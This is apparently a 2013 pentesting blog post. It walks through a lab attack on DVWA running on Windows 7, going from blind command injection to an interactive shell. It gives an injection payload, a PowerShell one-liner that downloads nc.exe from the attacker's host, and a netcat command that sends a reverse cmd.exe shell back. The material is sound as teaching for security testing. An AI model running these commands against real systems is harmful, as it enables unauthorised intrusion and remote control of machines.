Wednesday, March 6, 2013

Retrieving Elusive Command Output

I have found myself on multiple pentests recently where I needed to retrieve (blind) command output from a remote machine. Blind remote command execution by itself is great, and you can do many evil thing to a machine without even having to view the output, but usually at some point during the attack lifecycle you will need to view command output (for example data exfiltration/shell upgrade). This post will assume the following things:

-Blind remote command execution has been verified (via icmp or some other method)
-You are attacking a web application
-You are attacking a windows host
-You wish to use native Window$ programs so you dont have to upload anything(more noise)

 The most common way to retrieve blind command output would be through FTP. This method works great, but for the sake of learning multiple ways to accomplish this I wanted a second way to view this command ouput. Our goal will be to upgrade to an interactive command prompt, allowing us to view command output.

Here is the setup:

Victim Machine: Win7 running DVWA (192.168.1.101)
Attacker Machine: Backtrack (192.168.1.107)

For this post, we will use to command execution vulnerability within DVWA as our initial "blind" command execution. I realize DVWA by default spits the cmd output back to you, but you can edit the PHP source code (and learn some more in the process) to make this a truly blind attack.

We will use the following payload to exploit the vulnerability:

127.0.0.1 | whoami

Now that we have established blind command execution, we need to use another tool native to Windows to grab a file for us. When it comes to Windows I do most things with Powershell, and have found a renewed love for it thanks to the awesome work from @mattifestation and @obscuresec with the PowerSploit project. Thus I wanted to use it to accomplish my goals. I needed a one-line Powershell command that would work similar to wget for linux. After some research, I came across this blog post that gave me what I needed. It goes something like this:

(new-object System.Net.WebClient).Downloadfile("http://attacker.com
/test.txt", "test.txt")

This command creates a new COM object for the System.Net.Webclient class and then uses the DownloadFile method passing it two parameters:
1) The location and name of the file you want to download
2) Where/what name you want to save it as on the local machine

Once I confirmed this command would reach out to my server, I put a netcat binary into the webserver root. 

Using this command (after modifying the quotes) and invoking the powershell.exe binary, I was able to pull netcat from my machine. The full command to the web application resulted in this:

127.0.0.1 | powershell.exe (new-object System.Net.WebClient).Downloadfile('http://192.168.1.107/nc.exe', 'nc.exe')



Then, once the command completed, I set up a netcat listener on my attacker machine and issued a second command to the web application to push a shell back to my attacker machine via netcat:

127.0.0.1 | nc.exe -e cmd.exe 192.168.1.107 21


In this post we used Powershell to go from blind/1-way command execution to an interactive windows shell allowing us to retrieve command output.

If you know of other ways to retrieve blind command execution output using native windows tools, please feel free to discuss in the comments.